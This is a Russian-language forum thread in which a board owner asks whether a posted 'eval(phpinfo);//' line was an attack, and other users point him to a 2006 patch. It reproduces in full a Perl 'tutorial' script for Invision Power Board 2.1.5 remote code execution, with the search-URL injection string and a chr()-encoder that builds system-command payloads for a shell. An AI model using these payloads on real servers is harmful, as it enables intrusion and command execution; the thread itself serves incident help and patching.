Перейти к контенту
  • 0

Меня хакнули?

TIER_FOREVER

Спросил TIER_FOREVER,

 Поделиться

Вопрос

TIER_FOREVER

TIER_FOREVER

Опубликовано
Опубликовано

Запостил один придурок: eval(phpinfo);//

 

Спустя минуту, отредатктил это сообщение на: спасибо

 

Это эксплоит был, да? Чё делать?

Ссылка на комментарий
Поделиться на других сайтах

6 ответов на этот вопрос

Рекомендуемые сообщения

  • 0
TIER_FOREVER

TIER_FOREVER

Опубликовано
  • Автор
Опубликовано

Да, я увидел это как обычный пост с текстом: eval(phpinfo);//

 

А потом вместо eval(phpinfo);// написали спасибо.

 

полазил по инету и вот что нашёл:

 

#!usr/bin/perl
## Invision Power Board <= 2.1.5 Remote Code Execution Tutorial
## By not null 
## Security Bunker Team
## http://secbun.info
## It is not an exploit! It is only tutorial, how to exploit a forum!
print q(
#-----------------------------------------#
# Invision Power Board 2.x.x RCE Tutorial #
# By Security Bunker Team | ©not null	 #
#	   http://www.secbun.info			#
#-----------------------------------------# );
print q(
Step 1: If you are already register on the forum, just login on it.
Else register  first;]);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;

print q(
Ok, we have successful log in. Let's fun;]
Step 2: Go to some of the forum, where you could post messages.
Step 3: Post a message, that consist our harmful code (muahaha)
The code is: "eval(phpinfo()); //" [without quotes]
);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(When message is post, open a new page in your browser and go to the Search 
(index.php?act=search). Use the search form to find your post just by your username. 
And make sure "Show results as posts" is selected.);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(You must see your post, that consist our code.
Then add to the end of the url next string:);
print "\r\n&lastdate=z|eval.*?%20//)%23e%00\r\n";
print q(and press enter...);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(Can you see a result of phpinfo? If yes, we have successful exploited forum :-]
So, let's modify our post to get a shell.
But on this step we have a problem: we can't use arguments in functions (e.g. system("ls")) in such form.
But we can use it by it's code (e.g. system(chr(34).chr(108).chr(115).chr(34)))
I'm include a simple tool, that will help you to encode you string into code.
Just type your command, and you will get a string, that you can copy and paste into your post);
print "\r\n";
$out = "";
while ()
{
  print "\r\nCommand for encode or 'exit' for exit ";
  while(<STDIN>)
{
   $cmd=$_;
   chomp($cmd);
   exit() if ($cmd eq 'exit');
   last;
}
$len = length($cmd);
for ($i=0; $i<$len; $i++)
{
 $s = substr($cmd,$i,1);
 $out.="chr(".ord($s).")";
 if($i != $len-1) 
 {
  $out.=".";
 }

}
print "eval(system(".$out.").chr(59).exit()); //";
$out = "";
}

 

Есть такой сплоит и небольшое описание по использованию

но имхо до конца не разобрался

Вписываю пост eval(phpinfo()); // далее захожу в поиск ,добавляю в Урл

&highlite=system&lastdate=z|eval.*?%20//)%23e%00

обновляю ,появляется страница PhP 4.0

 

Гляньте источник: http://www.exploit.in/forum/lofiversion/index.php/t4027.html

 

Его действия были именно такими, пост, потом поиск. Что делать-то?

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Arhar

Arhar

Опубликовано
Опубликовано
пост, потом поиск

http://www.ibresource.ru/forums/index.php?...8&hl=search

вроде это исправление

скорее всего у хакера ничего не вышло

 

ну и посмотри все исправления какие есть

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Song

Song

Опубликовано
Опубликовано
Это давнишний сплойт. Вот исравление: !!! Уязвимость удалённого выполнения команд на сервере от 25 апреля 2006 года
Ссылка на комментарий
Поделиться на других сайтах
  • 0
TIER_FOREVER

TIER_FOREVER

Опубликовано
  • Автор
Опубликовано
Спасибо, но это вроде бы тоже самое, что и Arhar дал выше. Разве что на разных сайтах. В любом случае спасибо, за помощь. :D
Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
 Поделиться
Перейти к списку вопросов
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.

  Согласен